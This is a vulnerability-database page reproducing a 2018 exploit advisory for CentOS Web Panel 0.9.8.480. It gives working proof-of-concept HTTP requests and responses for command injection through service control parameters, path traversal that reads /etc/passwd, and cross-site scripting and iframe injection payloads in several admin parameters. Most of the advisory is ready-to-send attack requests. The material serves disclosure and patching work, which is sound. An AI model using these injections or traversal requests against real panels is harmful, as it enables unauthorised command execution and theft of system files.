Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Centos Web Panel 0.9.8.480 XSS / LFI / Code Execution

🗓️ 15 Oct 2018 00:00:00Reported by Siber Guvenlik HizmetleriType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 53 Views

Centos Web Panel 0.9.8.480 Multiple Vulnerabilities including XSS, LFI, and Code Executio

Related
Code
ReporterTitlePublishedViews
Family
CNVD		CentOS Web Panel Command Injection Vulnerability
15 Oct 201800:00
cnvd
CNVD		CentOS Web Panel Cross-Site Scripting Vulnerability (CNVD-2019-18497)
15 Oct 201800:00
cnvd
CNVD		CentOS Web Panel Local File Inclusion Vulnerability
15 Oct 201800:00
cnvd
Check Point Advisories		CentOS Web Panel Directory Traversal (CVE-2018-18323)
31 May 202000:00
checkpoint_advisories
Check Point Advisories		CentOS Web Panel Command Injection (CVE-2018-18322)
10 Jul 201900:00
checkpoint_advisories
CVE		CVE-2018-18322
15 Oct 201807:00
cve
CVE		CVE-2018-18323
15 Oct 201807:00
cve
CVE		CVE-2018-18324
15 Oct 201807:00
cve
Cvelist		CVE-2018-18322
15 Oct 201807:00
cvelist
Cvelist		CVE-2018-18323
15 Oct 201807:00
cvelist
Rows per page
`# Exploit Title: Centos Web Panel 0.9.8.480 Multiple Vulnerabilities  
# Exploit Author: Seccops - Siber GA1/4venlik Hizmetleri (https://seccops.com)  
# Vendor Homepage: http://centos-webpanel.com/  
# Software Link: http://centos-webpanel.com/system-requirements  
# Version: 0.9.8.480  
# Tested on: Centos 7  
# Vulnerability Types: Command Injection, Local File Inclusion, Cross-site Scripting, Frame Injection  
# CVE: -  
  
### Vulnerability Name: Command Injection ###  
  
1)  
Proof URL: http://localhost:2030/admin/index.php?service_start=opendkim;expr 268409241 - 2;x   
Parameter Name: service_start   
Parameter Type: GET   
Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx   
  
HTTP Request:  
  
GET /admin/index.php?service_start=opendkim%3bexpr%20268409241%20-%202%3bx HTTP/1.1  
Host: localhost:2030  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D  
Referer: http://localhost:2030/admin/  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36  
  
Note: Mathematical process: 268409241 - 2. So, the result is expected 268409239.  
  
HTTP Response:  
  
HTTP/1.1 200 OK  
Server: cwpsrv  
X-Powered-By: PHP/7.0.24  
Connection: keep-alive  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Pragma: no-cache  
Content-Type: text/html; charset=UTF-8  
Transfer-Encoding: chunked  
Date: Mon, 01 Oct 2018 21:06:42 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
  
HTML Content:  
  
<div class='alert alert-warning'>  
<button type='button' class='close' data-dismiss='alert'>A</button>  
<strong>WARNING!</strong> <pre>268409239  
sh: x.service: command not found  
</pre><br>  
  
2)  
Proof URL: http://localhost:2030/admin/index.php?service_restart=sshd;expr 268409241 - 2;x   
Parameter Name: service_restart   
Parameter Type: GET   
Attack Pattern: sshd%3bexpr+268409241+-+2%3bx  
  
3)  
Proof URL: http://localhost:2030/admin/index.php?service_fullstatus=opendkim;expr 268409241 - 2;x   
Parameter Name: service_fullstatus   
Parameter Type: GET   
Attack Pattern: opendkim%3bexpr+268409241+-+2%3bx   
  
4)  
Proof URL: http://localhost:2030/admin/index.php?service_stop=named;expr 268409241 - 2;x   
Parameter Name: service_stop   
Parameter Type: GET   
Attack Pattern: named%3bexpr+268409241+-+2%3bx  
  
### Vulnerability Name: Local File Inclusion ###  
  
1)  
Proof URL: http://localhost:2030/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd   
Parameter Name: file   
Parameter Type: GET   
Attack Pattern: %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd   
  
HTTP Request:  
  
GET /admin/index.php?module=file_editor&file=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1  
Host: localhost:2030  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8  
Accept-Encoding: gzip, deflate  
Accept-Language: en-us,en;q=0.5  
Cache-Control: no-cache  
Cookie: cwpsrv-983b3c1326b3c5dafa7941a1ef2fbf67=jhg556f3k83kpgbhbdfsd0pps6; resolve_ids=0; roundcube_sessid=j2h7ad1kb1coji7hba2bo5pil5; order_dir_list_by=7D  
Referer: http://localhost:2030/admin/index.php  
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36  
  
HTTP Response:  
  
HTTP/1.1 200 OK  
Server: cwpsrv  
X-Powered-By: PHP/7.0.24  
Connection: keep-alive  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Pragma: no-cache  
Content-Type: text/html; charset=UTF-8  
Transfer-Encoding: chunked  
Date: Mon, 01 Oct 2018 20:45:19 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
  
HTML Content:  
File info <a href='index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd&stats=yes'>[stats]</a>:<pre>-rw-r--r-- 1 root root 2272 Sep 28 07:48 /../../../../../../../../../../../etc/passwd  
</pre><h3>Contents of File: /../../../../../../../../../../../etc/passwd</h3>  
<form action='' method= 'post'>  
<textarea id='textarea' name='newd' cols='100%' rows='50'>root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
etc...  
  
### Vulnerability Name: Cross-site Scripting & Frame Injection ###  
  
1)  
Proof URL: http://localhost:2030/admin/fileManager2.php?frame=3&action=8&cmd_arg=design&fm_current_dir=<scRipt>alert(1)</scRipt>   
Parameter Name: fm_current_dir   
Parameter Type: GET   
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e  
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e  
  
2)  
Proof URL: http://localhost:2030/admin/index.php?module=<scRipt>alert(1)</scRipt>&file=/etc/sysconfig/selinux   
Parameter Name: module   
Parameter Type: GET   
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e  
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e  
  
3)  
Proof URL: http://localhost:2030/admin/index.php?service_start=<scRipt>alert(1)</scRipt>   
Parameter Name: service_start   
Parameter Type: GET   
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e  
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e  
  
4)  
Proof URL: http://localhost:2030/admin/index.php?service_fullstatus=<scRipt>alert(1)</scRipt>   
Parameter Name: service_fullstatus   
Parameter Type: GET   
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e  
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e  
  
5)  
Proof URL: http://localhost:2030/admin/index.php?service_restart=<scRipt>alert(1)</scRipt>   
Parameter Name: service_restart   
Parameter Type: GET   
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e  
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e  
  
6)  
Proof URL: http://localhost:2030/admin/index.php?service_stop=<scRipt>alert(1)</scRipt>   
Parameter Name: service_stop   
Parameter Type: GET   
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e  
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e  
  
7)  
Proof URL: http://localhost:2030/admin/index.php?module=file_editor&file=<scRipt>alert(1)</scRipt>   
Parameter Name: file   
Parameter Type: GET   
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e  
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e  
  
8)  
Proof URL: http://localhost:2030/admin/index.php?module=<scRipt>alert(1)</scRipt>&dir=/var/log   
Parameter Name: module   
Parameter Type: GET   
Attack Pattern for XSS: %3cscRipt%3ealert(1)%3c%2fscRipt%3e  
Attack Pattern for Frame Injection: %3ciframe+src%3d%22https%3a%2f%2fseccops.com%2f%3f%22%3e%3c%2fiframe%3e  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Oct 2018 00:00Current
EPSS0.78382
centosweb panelvulnerabilitiesxsscommand injectionlocal file inclusioncross-site scriptingframe injection
53